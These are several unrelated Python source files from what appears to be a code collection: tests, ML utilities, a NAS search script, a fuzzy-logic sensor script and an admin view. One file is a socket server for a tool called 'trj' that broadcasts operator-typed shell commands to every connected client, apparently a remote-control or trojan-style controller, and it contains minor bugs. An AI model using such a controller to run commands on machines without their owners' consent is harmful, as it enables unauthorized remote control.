discoveries_count += 1
client.add_discoveries(discoveries, 'test_repo')
@classmethod
def tearDownClass(cls):
""" Remove database and exported CSV after finishing tests. """
os.remove(cls.db_path)
os.remove(cls.csv_path)
@parameterized.expand([
param(state='new', count=5),
param(state='false_positive', count=6),
param(state='addressing', count=7),
param(state='not_relevant', count=8),
param(state='fixed', count=9)
])
def test_get_discoveries(self, state, count):
""" Test if we retrieve the correct number of discoveries for every
possible state value.
Parameters
----------
state: str
The state to filter discoveries on
count: int
The expected number of discoveries to be returned
"""
with self.assertRaises(SystemExit) as cm:
cli.main(
[
'',
'get_discoveries',
'test_repo',
'--sqlite',
self.db_path,
'--save',
self.csv_path,
'--state',
state
]
)
self.assertEqual(cm.exception.code, count)
@parameterized.expand([
param(file='danger', count=5),
param(file='fake_file', count=30)
])
def test_get_discoveries_per_file(self, file, count):
""" Test if we retrieve the correct number of discoveries based on
filename input.
Parameters
----------
file: str
The file name to filter discoveries on
count: int
The expected number of discoveries to be returned
"""
with self.assertRaises(SystemExit) as cm:
cli.main(
[
'',
'get_discoveries',
'test_repo',
'--sqlite',
self.db_path,
'--save',
self.csv_path,
'--filename',
file
]
)
self.assertEqual(cm.exception.code, count)
def test_csv_written(self):
""" Test if the CLI command writes correctly the CSV file. """
with self.assertRaises(SystemExit):
cli.main(
[
'',
'get_discoveries',
'test_repo',
'--sqlite',
self.db_path,
'--save',
self.csv_path
]
)
data_frame = pd.read_csv(self.csv_path)
        assert data_frame.notna().values.all(), 'CSV file contains NaN'
|
11556493
|
import sys
import os
import os.path
import json
import logging
from email.parser import Parser
from collections import namedtuple
from zipfile import ZipFile
from pkg_resources import EntryPoint, parse_version
import minemeld.loader
LOG = logging.getLogger(__name__)
__all__ = [
'get_metadata_from_wheel',
'activated_extensions',
'installed_extensions',
'extensions',
'freeze',
'load_frozen_paths'
]
METADATA_MAP = {
'name': 'Name',
'version': 'Version',
'author': 'Author',
'author_email': 'Author-email',
'description': 'Summary',
'url': 'Home-page'
}
InstalledExtension = namedtuple(
'InstalledExtension',
[
'name', 'version', 'author', 'author_email',
'description', 'url', 'path', 'entry_points'
]
)
ActivatedExtension = namedtuple(
'ActivatedExtension',
[
'name', 'version', 'author', 'author_email',
'description', 'url', 'location', 'entry_points'
]
)
ExternalExtension = namedtuple(
'ExternalExtension',
[
'name', 'version', 'author', 'author_email',
'description', 'url', 'path', 'activated',
'installed', 'entry_points'
]
)
def _egg_link_path(dist):
for path_item in sys.path:
egg_link = os.path.join(path_item, dist.project_name + '.egg-link')
if os.path.isfile(egg_link):
return egg_link
return None
def _read_metadata(metadata_str):
return Parser().parsestr(metadata_str)
def _read_entry_points(ep_contents):
ep_map = EntryPoint.parse_map(ep_contents)
    for _, epgroup in ep_map.items():
        for epname, ep in epgroup.items():
epgroup[epname] = str(ep)
return ep_map
def _activated_extensions():
epgroups = (
minemeld.loader.MM_NODES_ENTRYPOINT,
minemeld.loader.MM_NODES_GCS_ENTRYPOINT,
minemeld.loader.MM_NODES_VALIDATORS_ENTRYPOINT,
minemeld.loader.MM_PROTOTYPES_ENTRYPOINT,
minemeld.loader.MM_API_ENTRYPOINT,
minemeld.loader.MM_WEBUI_ENTRYPOINT
)
activated_extensions = {}
for epgroup in epgroups:
        for _, epvalue in minemeld.loader.map(epgroup).items():
if epvalue.ep.dist.project_name == 'minemeld-core':
continue
location = 'site-packages'
egg_link = _egg_link_path(epvalue.ep.dist)
if egg_link is not None:
with open(egg_link, 'r') as f:
location = f.readline().strip()
metadata = {
'name': epvalue.ep.dist.project_name,
'version': epvalue.ep.dist.version,
'author': None,
'author_email': None,
'description': None,
'url': None,
'entry_points': None
}
if egg_link:
try:
with open(os.path.join(location, 'minemeld.json'), 'r') as f:
dist_metadata = json.load(f)
for k in metadata.keys():
metadata[k] = dist_metadata.get(k, None)
except (IOError, OSError) as excpt:
                LOG.error('Error loading metadata from {}: {}'.format(location, str(excpt)))
elif epvalue.ep.dist.has_metadata('METADATA'):
dist_metadata = _read_metadata(
epvalue.ep.dist.get_metadata('METADATA')
)
for k in metadata.keys():
if k in METADATA_MAP and METADATA_MAP[k] in dist_metadata:
metadata[k] = dist_metadata[METADATA_MAP[k]]
if epvalue.ep.dist.has_metadata('entry_points.txt'):
metadata['entry_points'] = _read_entry_points(
epvalue.ep.dist.get_metadata('entry_points.txt')
)
activated_extensions[epvalue.ep.dist.project_name] = ActivatedExtension(
location=location,
**metadata
)
return activated_extensions
def _load_metadata_from_wheel(extpath, extname=None):
wheel_name = extname
if extname is None:
wheel_name = os.path.basename(extpath)
project_name, version, _ = wheel_name.split('-', 2)
metadata_path = '{}-{}.dist-info/METADATA'.format(project_name, version)
with ZipFile(extpath, 'r') as wheel_file:
metadata_file = wheel_file.open(metadata_path, 'r')
metadata_lines = metadata_file.read()
metadata = _read_metadata(metadata_lines)
# classifier framework :: minemeld should be in METADATA
# for this to be an extension
classifiers = metadata.get_all('Classifier')
if classifiers is None:
return None
for c in classifiers:
if c.lower() == 'framework :: minemeld':
break
else:
return None
ie_metadata = {}
for field in InstalledExtension._fields:
if field == 'path' or field == 'entry_points':
continue
ie_metadata[field] = metadata.get(METADATA_MAP[field], None)
entry_points = None
try:
ep_path = '{}-{}.dist-info/entry_points.txt'.format(project_name, version)
with ZipFile(extpath, 'r') as wheel_file:
ep_file = wheel_file.open(ep_path, 'r')
ep_contents = ep_file.read()
entry_points = _read_entry_points(ep_contents)
except (IOError, OSError):
pass
ie_metadata['entry_points'] = entry_points
return InstalledExtension(
path=extpath,
**ie_metadata
)
def _load_metadata_from_dir(extpath):
with open(os.path.join(extpath, 'minemeld.json'), 'r') as f:
metadata = json.load(f)
return InstalledExtension(
name=metadata['name'],
version=metadata['version'],
author=metadata['author'],
author_email=metadata.get('author_email', None),
description=metadata.get('description', None),
url=metadata.get('url', None),
entry_points=metadata.get('entry_points', None),
path=extpath
)
def _is_activated(installed_extension, activated):
activated_extension = activated.get(installed_extension.name, None)
if activated_extension is None:
return False
if activated_extension.version != installed_extension.version:
return False
if installed_extension.path == activated_extension.location:
return True
if activated_extension.location == 'site-packages' and \
installed_extension.path.endswith('.whl'):
return True
return False
def get_metadata_from_wheel(wheelpath, wheelname=None):
return _load_metadata_from_wheel(wheelpath, wheelname)
def installed_extensions(installation_dir):
_installed_extensions = []
entries = os.listdir(installation_dir)
for e in entries:
epath = os.path.join(installation_dir, e)
# check if this is a wheel
if e.endswith('.whl'):
try:
installed_extension = _load_metadata_from_wheel(epath)
if installed_extension is None:
continue
_installed_extensions.append(installed_extension)
except (ValueError, IOError, KeyError, OSError) as excpt:
LOG.error(u'Error extracting metadata from {}: {}'.format(e, str(excpt)))
# check if it is a directory
elif os.path.isdir(epath):
try:
installed_extension = _load_metadata_from_dir(epath)
if installed_extension is None:
continue
_installed_extensions.append(installed_extension)
except (IOError, OSError, KeyError) as excpt:
LOG.error(u'Error extracting metadata from {}: {}'.format(e, str(excpt)))
return _installed_extensions
def activated_extensions():
return _activated_extensions()
def extensions(installation_dir):
_extensions = []
_installed = installed_extensions(installation_dir)
_activated = activated_extensions()
for installed_extension in _installed:
_extension_activated = _is_activated(installed_extension, _activated)
_extensions.append(ExternalExtension(
installed=True,
activated=_extension_activated,
**installed_extension._asdict()
))
if _extension_activated:
_activated.pop(installed_extension.name)
for _activated_extension in _activated.values():
_adict = _activated_extension._asdict()
_adict.pop('location')
_extensions.append(ExternalExtension(
installed=False,
activated=True,
path=None,
**_adict
))
return _extensions
def freeze(installation_dir):
_freeze = []
_extensions = extensions(installation_dir)
for e in _extensions:
if not e.activated:
continue
if not e.installed:
continue
if e.path.endswith('.whl'):
_freeze.append(e.path)
else:
_freeze.append('-e {}'.format(e.path))
return _freeze
def load_frozen_paths(freeze_file):
    for line in freeze_file:
        line = line.strip()
        if not line.startswith('-e '):
            continue
        _, epath = line.split(' ', 1)
if epath not in sys.path:
LOG.info('Extension path {!r} not in sys.path, adding'.format(epath))
sys.path.append(epath)
|
11556497
|
from .uncset import UncSet
from .uncparam import UncParam
from .reformulate import (PolyhedralTransformation,
EllipsoidalTransformation,
GeneratorTransformation,
WGPTransformation)
from .solver import (ReformulationSolver,
CuttingPlaneSolver)
from .generator import RobustConstraint
from .components import AdjustableVar
from .adjustable import LDRAdjustableTransformation
|
11556602
|
import socket
import threading
import sys
import monoclient
import decorators
import loads
def request_server_option():
"""
    Prompts the user to select a menu option and returns it.
    Returns
    -------
    option: int
        The selected option (0 if the input was invalid).
"""
colors = decorators.Colors()
option = 0
try:
option = int(input(f"{colors.OK}Select what do you want to do: {colors.ENDC}"))
except ValueError as e:
print(f"{colors.ERR}Error, invalid value for base 10 {e}{self.__colors.ENDC}")
except Exception as e:
print(f"{colors.ERR}Error, invalid iteral / option... {e}{colors.ENDC}")
return option
class ServerConfiguration():
"""
    The class is used to handle all the configuration for a specific
    server and encapsulate it.
"""
def __init__(self, port, ip, dcf, bites, dmsg, emsg):
"""
The constructor method for the ServerConfiguration class.
From here all the attributes of the class are created.
Parameters
----------
port: int
The port of the server
ip: str
The ip address of the server
dcf: str
The format the server uses
bites: int
            The maximum number of bytes the server reads per message.
        dmsg: str
            The message used to disconnect a client.
        emsg: str
            The command used to exit back to the menu.
        """
self.__port = port
self.__ip = ip
self.__dcf = dcf
self.__bites = bites
self.__disconnect_msg = dmsg
self.__exit_msg = emsg
def __repr__(self):
"""
Returns a short representation of all the information.
"""
return f"{self.get_port()}: {self.get_ip()}"
def setup_server(self):
"""
Set ups the complete server using the return statement.
Returns
-------
port, ip, dcf, bites
"""
return (
self.get_port(),
self.get_ip(),
self.get_dcf(),
self.get_bites(),
self.get_dmsg(),
self.get_emsg()
)
def get_port(self):
return self.__port
def get_ip(self):
return self.__ip
def get_dcf(self):
return self.__dcf
def get_bites(self):
return self.__bites
def get_dmsg(self):
return self.__disconnect_msg
def get_emsg(self):
return self.__exit_msg
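# Illustrative example (hypothetical values): build a configuration and unpack
# it in the exact order setup_server() returns.
# conf = ServerConfiguration(5050, "127.0.0.1", "utf-8", 1024, "!DISCONNECT", "!EXIT")
# port, ip, dcf, bites, dmsg, emsg = conf.setup_server()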
class Server:
"""
This class is used to manage all the servers trj uses and to manage
the sockets.
"""
def __init__(self, conf):
"""
This is the constructor method for the Server class, from here all the
attributes of the class are created
Parameters
----------
conf: ServerConfiguration
The configuration of the sever
"""
self.port, self.ip, self.dcf, self.bites, dmsg, emsg = conf.setup_server()
self.addr = (self.ip, self.port)
self.__loop_thread = None
self.disconnect = dmsg # msg to disconnect
self.exit_command = emsg
# create the actual server of the instance
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind(self.addr) # bind the server to the addr
self.clients = {} # stores configuration of each client
# colors
self.__colors = decorators.Colors()
# loop hash for the options
self.__loop_func_hash = {
0: self.__close,
1: self.__send_to_all_clients,
2: self.__type_a_message,
3: self.__clean_screen
}
def broadcast(self, msg):
client_data_register = list()
for i, client in self.clients.items():
client.send(msg, self.dcf)
client_data = client.recv(self.bites, self.dcf)
client_data_register.append(client_data)
return client_data_register
def __close(self):
"""
Closes all the clients and then closes the server and exits the app.
"""
for client in self.clients.values():
client.close()
        self.clients = {}
print("Press CTRL+C 2 times to exit the server...")
decorators.exit()
def __send_to_all_clients(self):
"""
Request a command and sends that command to all the clients connected
(kind of a broadcast)
"""
print(f"Remember to type {self.exit_command} for going back to the menu...")
while True:
command = input(">>> ")
if command == self.exit_command:
break
cdr = self.broadcast(command)
print(f"{self.__colors.INFO}{command} sended to {len(cdr)} clients{self.__colors.ENDC}")
def __type_a_message(self):
maximum_lines = 30
lines = []
for i in range(maximum_lines):
uni = input() or "" # uni = user input
if uni == self.exit_command:
break
else:
lines.append(uni)
text = '\n'.join(lines)
self.broadcast(f'echo "{text}"')
def __clean_screen(self):
self.broadcast("clear")
def __loop(self):
"""
This method is used to loop the options and depending on what the
server manager types, it will invoke other methods.
"""
looping = True
# create the simple hash
while looping:
key = 0
# Print the options
decorators.print_server_options(decorators.get_hash())
key = request_server_option()
# Get the option and start the hash map
try:
if key == 0:
self.__close()
decorators.exit()
else:
print(f"Eecuting function {key}...")
self.__loop_func_hash[key]() # the position 0 is the function
except KeyError as e:
print(f"{self.__colors.ERR}Invalid option... {option}{self.__colors.ENDC}")
self.__close()
except Exception as e:
print(f"{self.__colors.FAIL}Internal crash at looping options... {e}{self.__colors.ENDC}")
self.__close()
def __handle_client(self, client_id, conf):
"""
This method is a thread used to handle all the clients that connect to
the server.
Parameters
----------
client_id: int
the number to determine the client
conf: monoclient.ClientConfiguration
The configuration of the client
"""
client = monoclient.Client(client_id, conf)
# some debug from the server
print(f"\n{self.__colors.INFO}[NEW CONNECTION] {client.conf.addr} connected.{self.__colors.ENDC}")
# append the connection to the clients
self.clients[client_id] = client
def start(self):
"""
This method is used to start the server itself using the .listen() method
and then starting a while loop to create the threads
Parameters: self => The Server() class
"""
# start the server and listen it
self.server.listen()
running = True
while running:
try:
conn, addr = self.server.accept()
client_configuration = monoclient.ClientConfiguration(conn, addr)
# ct stands for client total (the counter of the client)
ct = len(self.clients)
# create the thread for the self.handle_client method
thread = threading.Thread(target=self.__handle_client, args=[ct, client_configuration])
thread.start()
# check if the loop thread is already working, if it's restart it.
if self.__loop_thread != None:
# If the loop thread is not equal to none, we should end this
                    # thread and reset it to None.
self.__loop_thread.join()
self.__loop_thread = None
# Set the loop thread to the actual thread
self.__loop_thread = threading.Thread(target=self.__loop)
self.__loop_thread.start()
except Exception as e:
# report the bug informing the user
print(f"[SERVER CRASH]: Fatal error, {e}")
def main(port, ip, dcf, bites, dmsg, emsg):
"""
    Builds a ServerConfiguration from the given parameters and starts
    the server.
"""
server_configuration = ServerConfiguration(port, ip, dcf, bites, dmsg, emsg)
if "-c" in sys.argv:
print(f"SERVER CONFIGURATION: {server_configuration.setup_server()}")
server = Server(server_configuration)
server.start()
if __name__ == '__main__':
ip, port, dcf, bites, dmsg, emsg = decorators.setup_yaml(loads.load_configuration())
# actually run the server
# check if the user did python3 server.py <ip> <port>
# create the server
arg = sys.argv
if len(arg) >= 3:
ip = arg[1]
port = int(arg[2])
main(port, ip, dcf, bites, dmsg, emsg)
|
11556606
|
import GPy
import numpy as np
from sklearn.base import BaseEstimator, RegressorMixin
from sklearn.utils import check_array
from sklearn.metrics import r2_score
from scipy.cluster.vq import kmeans2
from typing import Tuple
class SparseGPR(BaseEstimator, RegressorMixin):
def __init__(
self,
kernel=None,
inference="vfe",
n_inducing=10,
max_iters=200,
optimizer="scg",
n_restarts=10,
verbose=None,
alpha=0.5,
):
self.kernel = kernel
self.n_inducing = n_inducing
self.inference = inference
self.max_iters = max_iters
self.optimizer = optimizer
self.n_restarts = n_restarts
self.verbose = verbose
self.alpha = alpha
    def fit(self, X: np.ndarray, y: np.ndarray) -> "SparseGPR":
# check Array
X = check_array(X)
# get dimensions of inputs
d_dimensions = X.shape[1]
# default Kernel Function
if self.kernel is None:
self.kernel = GPy.kern.RBF(input_dim=d_dimensions, ARD=True)
# Get inducing points
z = kmeans2(X, self.n_inducing, minit="points")[0]
# Kernel matrix
self.gp_model = GPy.models.SparseGPRegression(X, y, kernel=self.kernel, Z=z)
# set the fitc inference
if self.inference.lower() == "vfe":
self.gp_model.inference_method = (
GPy.inference.latent_function_inference.VarDTC()
)
elif self.inference.lower() == "fitc":
self.gp_model.inference_method = (
GPy.inference.latent_function_inference.FITC()
)
elif self.inference.lower() == "pep":
self.gp_model.inference_method = GPy.inference.latent_function_inference.PEP(
self.alpha
)
else:
raise ValueError(f"Unrecognized inference method: {self.inference}")
# Make likelihood variance low to start
self.gp_model.Gaussian_noise.variance = 0.01
# Optimization
if self.n_restarts >= 1:
self.gp_model.optimize_restarts(
num_restarts=self.n_restarts,
robust=True,
verbose=self.verbose,
max_iters=self.max_iters,
)
else:
self.gp_model.optimize(
self.optimizer, messages=self.verbose, max_iters=self.max_iters
)
return self
def display_model(self):
return self.gp_model
def predict(
self, X: np.ndarray, return_std: bool = False, noiseless: bool = True
) -> Tuple[np.ndarray, np.ndarray]:
        if not isinstance(noiseless, bool):
            raise ValueError(f"Unrecognized argument for noiseless: {noiseless}")
        include_likelihood = not noiseless
mean, var = self.gp_model.predict(X, include_likelihood=include_likelihood)
if return_std:
return mean, np.sqrt(var)
else:
return mean
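# Minimal usage sketch (assumes GPy is installed; the data below is synthetic
# and the hyperparameters are illustrative, not tuned values).
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    X_demo = rng.uniform(-3, 3, (100, 1))
    y_demo = np.sin(X_demo) + 0.1 * rng.randn(100, 1)
    gp = SparseGPR(n_inducing=10, n_restarts=0, max_iters=50, verbose=False)
    gp.fit(X_demo, y_demo)
    mean, std = gp.predict(X_demo, return_std=True)
    print("train R2: %.3f" % r2_score(y_demo, mean))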
|
11556611
|
import json
from abc import ABCMeta, abstractmethod
class ConfigurableTrainerFitResult:
"""
Result object of a ConfigurableModel fit. Contains a score for the fitted model and also additional metadata.
"""
def __init__(self, score: float, score_name: str, score_epoch: int = -1, additional_metadata: dict = None):
self.score = score
self.score_name = score_name
self.score_epoch = score_epoch
self.additional_metadata = additional_metadata if additional_metadata is not None else {}
def __str__(self):
fit_result_str = f"Score Name: {self.score_name}\n" \
f"Score Value: {self.score:.3f}\n"
if self.score_epoch != -1:
fit_result_str += f"Score Epoch: {self.score_epoch}\n"
fit_result_str += f"Additional Metadata: {json.dumps(self.additional_metadata, indent=2)}"
return fit_result_str
class ConfigurableTrainer(metaclass=ABCMeta):
"""
    Abstract configurable trainer class. Wraps a model and trainer to create an abstraction for hyperparameter tuning.
"""
@abstractmethod
def fit(self, params: dict) -> ConfigurableTrainerFitResult:
"""
        Fits the model using the latest compiled configuration. Returns a ConfigurableTrainerFitResult with the score for
        the model (the larger the better) and any additional metadata. An example score is the negative validation loss.
"""
raise NotImplementedError
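# Minimal sketch (not from the original file): a toy subclass showing the
# contract, scoring a single hyperparameter with a negative squared error.
class ToyConfigurableTrainer(ConfigurableTrainer):
    def fit(self, params: dict) -> ConfigurableTrainerFitResult:
        lr = params.get("lr", 0.1)
        score = -((lr - 0.01) ** 2)  # pretend the optimum is lr=0.01
        return ConfigurableTrainerFitResult(score, "neg_sq_lr_error",
                                            additional_metadata={"lr": lr})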
|
11556633
|
import os
from bob.bio.base.test.dummy.database import database
import bob.io.image
# Creates a list of unique str
samples = [s.key for s in database.background_model_samples()]
def reader(sample):
data = bob.io.image.load(
os.path.join(database.database.original_directory, sample + database.database.original_extension)
)
return data
def make_key(sample):
return sample
|
11556636
|
import os
import sys
sys.path.insert(0, os.getcwd())
import numpy as np
import argparse
import json
import random
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from models.pretraining_nasbench101 import configs
from utils.utils import load_json, preprocessing
from models.model import Model
from torch.distributions import MultivariateNormal
class Env(object):
def __init__(self, name, seed, emb_path, model_path, cfg, data_path=None, save=False):
self.name = name
self.model_path = model_path
self.emb_path = emb_path
self.seed = seed
self.dir_name = 'pretrained/dim-{}'.format(args.dim)
self.visited = {}
self.features = []
self.embedding = {}
self._reset(data_path, save)
def _reset(self, data_path, save):
if not save:
print("extract arch2vec from {}".format(os.path.join(self.dir_name, self.model_path)))
if not os.path.exists(os.path.join(self.dir_name, self.model_path)):
exit()
dataset = load_json(data_path)
self.model = Model(input_dim=5, hidden_dim=128, latent_dim=16, num_hops=5, num_mlp_layers=2, dropout=0, **cfg['GAE']).cuda()
self.model.load_state_dict(torch.load(os.path.join(self.dir_name, self.model_path).format(args.dim))['model_state'])
self.model.eval()
with torch.no_grad():
print("length of the dataset: {}".format(len(dataset)))
self.f_path = os.path.join(self.dir_name, 'arch2vec-{}'.format(self.model_path))
if os.path.exists(self.f_path):
print('{} is already saved'.format(self.f_path))
exit()
print('save to {}'.format(self.f_path))
for ind in range(len(dataset)):
adj = torch.Tensor(dataset[str(ind)]['module_adjacency']).unsqueeze(0).cuda()
ops = torch.Tensor(dataset[str(ind)]['module_operations']).unsqueeze(0).cuda()
adj, ops, prep_reverse = preprocessing(adj, ops, **cfg['prep'])
test_acc = dataset[str(ind)]['test_accuracy']
valid_acc = dataset[str(ind)]['validation_accuracy']
time = dataset[str(ind)]['training_time']
x,_ = self.model._encoder(ops, adj)
self.embedding[ind] = {'feature': x.squeeze(0).mean(dim=0).cpu(), 'valid_accuracy': float(valid_acc), 'test_accuracy': float(test_acc), 'time': float(time)}
torch.save(self.embedding, self.f_path)
print("finish arch2vec extraction")
exit()
else:
self.f_path = os.path.join(self.dir_name, self.emb_path)
print("load arch2vec from: {}".format(self.f_path))
self.embedding = torch.load(self.f_path)
for ind in range(len(self.embedding)):
self.features.append(self.embedding[ind]['feature'])
self.features = torch.stack(self.features, dim=0)
print('loading finished. pretrained embeddings shape: {}'.format(self.features.shape))
def get_init_state(self):
"""
:return: 1 x dim
"""
random.seed(args.seed)
        rand_indices = random.randint(0, self.features.shape[0] - 1)  # randint is inclusive on both ends
self.visited[rand_indices] = True
return self.features[rand_indices], self.embedding[rand_indices]['valid_accuracy'],\
self.embedding[rand_indices]['test_accuracy'], self.embedding[rand_indices]['time']
def step(self, action):
"""
action: 1 x dim
self.features. N x dim
"""
dist = torch.norm(self.features - action.cpu(), dim=1)
knn = (-1 * dist).topk(dist.shape[0])
min_dist, min_idx = knn.values, knn.indices
count = 0
while True:
if len(self.visited) == dist.shape[0]:
print("cannot find in the dataset")
exit()
if min_idx[count].item() not in self.visited:
self.visited[min_idx[count].item()] = True
break
count += 1
return self.features[min_idx[count].item()], self.embedding[min_idx[count].item()]['valid_accuracy'], \
self.embedding[min_idx[count].item()]['test_accuracy'], self.embedding[min_idx[count].item()]['time']
class Policy(nn.Module):
def __init__(self, hidden_dim1, hidden_dim2):
super(Policy, self).__init__()
self.fc1 = nn.Linear(hidden_dim1, hidden_dim2)
self.fc2 = nn.Linear(hidden_dim2, hidden_dim1)
self.saved_log_probs = []
self.rewards = []
def forward(self, input):
x = F.relu(self.fc1(input))
out = self.fc2(x)
return out
class Policy_LSTM(nn.Module):
def __init__(self, hidden_dim1, hidden_dim2):
super(Policy_LSTM, self).__init__()
self.lstm = torch.nn.LSTMCell(input_size=hidden_dim1, hidden_size=hidden_dim2)
self.fc = nn.Linear(hidden_dim2, hidden_dim1)
self.saved_log_probs = []
self.rewards = []
self.hx = None
self.cx = None
def forward(self, input):
if self.hx is None and self.cx is None:
self.hx, self.cx = self.lstm(input)
else:
self.hx, self.cx = self.lstm(input, (self.hx, self.cx))
mean = self.fc(self.hx)
return mean
def select_action(state, policy):
"""
MVN based action selection.
:param state: 1 x dim
:param policy: policy network
:return: action: 1 x dim
"""
mean = policy(state.view(1, state.shape[0]))
mvn = MultivariateNormal(mean, torch.eye(state.shape[0]).cuda())
action = mvn.sample()
policy.saved_log_probs.append(torch.mean(mvn.log_prob(action)))
return action
def finish_episode(policy, optimizer):
R = 0
policy_loss = []
returns = []
    for r in policy.rewards:
        R = r + 0.8 * R
        returns.append(R)
    # Note: the discounted returns computed above are discarded; the update
    # below uses the raw rewards with a fixed baseline of 0.95 instead.
    returns = torch.Tensor(policy.rewards)
    returns = returns - 0.95
for log_prob, R in zip(policy.saved_log_probs, returns):
policy_loss.append(-log_prob * R)
optimizer.zero_grad()
policy_loss = torch.mean(torch.stack(policy_loss, dim=0))
print("average reward: {}, policy loss: {}".format(sum(policy.rewards)/len(policy.rewards), policy_loss.item()))
policy_loss.backward()
optimizer.step()
del policy.rewards[:]
del policy.saved_log_probs[:]
policy.hx = None
policy.cx = None
def reinforce_search(env, args):
""" implementation of arch2vec-REINFORCE """
policy = Policy_LSTM(args.dim, 128).cuda()
optimizer = optim.Adam(policy.parameters(), lr=1e-2)
counter = 0
BEST_VALID_ACC = 0.9505542318026224
BEST_TEST_ACC = 0.943175752957662
MAX_BUDGET = 1.5e6
rt = 0
state, _, _, time = env.get_init_state()
CURR_BEST_VALID = 0
CURR_BEST_TEST = 0
test_trace = []
valid_trace = []
time_trace = []
while rt < MAX_BUDGET:
for c in range(args.bs):
state = state.cuda()
action = select_action(state, policy)
state, reward, reward_test, time = env.step(action)
policy.rewards.append(reward)
counter += 1
rt += time
print('counter: {}, validation reward: {}, test reward: {}, time: {}'.format(counter, reward, reward_test, rt))
if reward > CURR_BEST_VALID:
CURR_BEST_VALID = reward
CURR_BEST_TEST = reward_test
valid_trace.append(float(BEST_VALID_ACC - CURR_BEST_VALID))
test_trace.append(float(BEST_TEST_ACC - CURR_BEST_TEST))
time_trace.append(rt)
if rt >= MAX_BUDGET:
break
finish_episode(policy, optimizer)
res = dict()
res['regret_validation'] = valid_trace
res['regret_test'] = test_trace
res['runtime'] = time_trace
save_path = os.path.join(args.output_path, 'dim{}'.format(args.dim))
if not os.path.exists(save_path):
os.mkdir(save_path)
print('save to {}'.format(save_path))
    s = args.emb_path[:-3] if args.emb_path.endswith('.pt') else args.emb_path
    fh = open(os.path.join(save_path, 'run_{}_{}.json'.format(args.seed, s)), 'w')
json.dump(res, fh)
fh.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="arch2vec-REINFORCE")
parser.add_argument("--gamma", type=float, default=0, help="discount factor (default 0.99)")
parser.add_argument("--seed", type=int, default=1, help="random seed")
parser.add_argument('--cfg', type=int, default=4, help='configuration (default: 4)')
parser.add_argument('--bs', type=int, default=16, help='batch size')
parser.add_argument('--dim', type=int, default=7, help='feature dimension')
parser.add_argument('--output_path', type=str, default='rl', help='rl/bo')
parser.add_argument('--emb_path', type=str, default='arch2vec.pt')
parser.add_argument('--model_path', type=str, default='model-nasbench-101.pt')
parser.add_argument('--saved_arch2vec', action="store_true", default=False)
args = parser.parse_args()
cfg = configs[args.cfg]
env = Env('REINFORCE', args.seed, args.emb_path, args.model_path, cfg, data_path='data/data.json', save=args.saved_arch2vec)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
torch.set_num_threads(2)
reinforce_search(env, args)
|
11556675
|
import numpy as np
import torch
import torch.distributions as td
import torch.nn as nn
class DenseModel(nn.Module):
def __init__(self, feature_size: int, output_shape: tuple, layers: int, hidden_size: int, dist='normal',
activation=nn.ELU):
super().__init__()
self._output_shape = output_shape
self._layers = layers
self._hidden_size = hidden_size
self._dist = dist
self.activation = activation
# For adjusting pytorch to tensorflow
self._feature_size = feature_size
# Defining the structure of the NN
self.model = self.build_model()
def build_model(self):
model = [nn.Linear(self._feature_size, self._hidden_size)]
model += [self.activation()]
for i in range(self._layers - 1):
model += [nn.Linear(self._hidden_size, self._hidden_size)]
model += [self.activation()]
model += [nn.Linear(self._hidden_size, int(np.prod(self._output_shape)))]
return nn.Sequential(*model)
def forward(self, features):
dist_inputs = self.model(features)
reshaped_inputs = torch.reshape(dist_inputs, features.shape[:-1] + self._output_shape)
if self._dist == 'normal':
return td.independent.Independent(td.Normal(reshaped_inputs, 1), len(self._output_shape))
if self._dist == 'binary':
return td.independent.Independent(td.Bernoulli(logits=reshaped_inputs), len(self._output_shape))
raise NotImplementedError(self._dist)
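# Usage sketch (synthetic shapes, not from the original file): a dense head
# over 64-dim features that parameterizes a Normal over a scalar output.
if __name__ == "__main__":
    head = DenseModel(feature_size=64, output_shape=(1,), layers=2, hidden_size=128)
    feats = torch.randn(8, 10, 64)   # (batch, time, feature)
    dist = head(feats)               # Independent Normal with event shape (1,)
    sample = dist.sample()           # -> torch.Size([8, 10, 1])
    print(sample.shape, dist.log_prob(sample).shape)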
|
11556680
|
from flask_login import current_user
from wtforms import ValidationError
from overhave.admin.views.base import ModelViewProtected
from overhave.db import Role
class DraftView(ModelViewProtected):
""" View for :class:`Draft` table. """
details_template = "draft_detail.html"
can_delete = True
column_list = ("id", "feature_id", "test_run_id", "pr_url", "published_by", "created_at", "status")
column_exclude_list = ("feature", "text") # type: ignore
column_details_list = (
"id",
"feature_id",
"test_run_id",
"pr_url",
"published_by",
"created_at",
"status",
"traceback",
)
column_sortable_list = ("id", "feature_id")
column_searchable_list = (
"test_run_id",
"published_by",
"pr_url",
)
column_filters = ("feature_id", "published_by", "created_at", "status")
def on_model_delete(self, model) -> None: # type: ignore
if not current_user.role == Role.admin:
raise ValidationError("Only administrator could delete published version of scenario!")
|
11556696
|
import matplotlib
matplotlib.use('Agg')
import numpy as np
import skfuzzy as fuzz
import matplotlib.pyplot as plt
import Adafruit_DHT
import RPi.GPIO as GPIO
import time
print('initialization...')
### initialization GPIO
relay_pin = 26
GPIO.setmode(GPIO.BCM)
GPIO.setup(relay_pin, GPIO.OUT)
sensor = Adafruit_DHT.DHT22
# DHT22 pin on Raspberry Pi
dht_pin = 23
########## INPUTS ########################
#Input Universe functions
temperature = np.arange(0, 11, 0.1)
humidity = np.arange(0, 11, 0.1)
# Input Membership Functions
# Temperature
temperature_cold = fuzz.gaussmf(temperature, 0, 1.5)
temperature_warm = fuzz.gaussmf(temperature, 5, 1.5)
temperature_hot = fuzz.gaussmf(temperature, 10, 1.5)
# Humidity
humidity_low = fuzz.trapmf(humidity, [0, 0, 1, 3])
humidity_high = fuzz.gaussmf(humidity, 10, 1.5)
########## OUTPUT ########################
# comfort
# Output Variables Domain
comfort = np.arange(0, 30, 0.1)
# Output Membership Function
comfort_low = fuzz.trimf(comfort, [0, 5, 10])
comfort_ave = fuzz.trimf(comfort, [10, 15, 25])
comfort_very = fuzz.trimf(comfort, [20, 25, 30])
def temperature_category(temperature_in=18):
temperature_cat_cold = fuzz.interp_membership(temperature, temperature_cold, temperature_in)
temperature_cat_warm = fuzz.interp_membership(temperature, temperature_warm, temperature_in)
temperature_cat_hot = fuzz.interp_membership(temperature, temperature_hot, temperature_in)
return dict(cold=temperature_cat_cold, warm=temperature_cat_warm, hot=temperature_cat_hot)
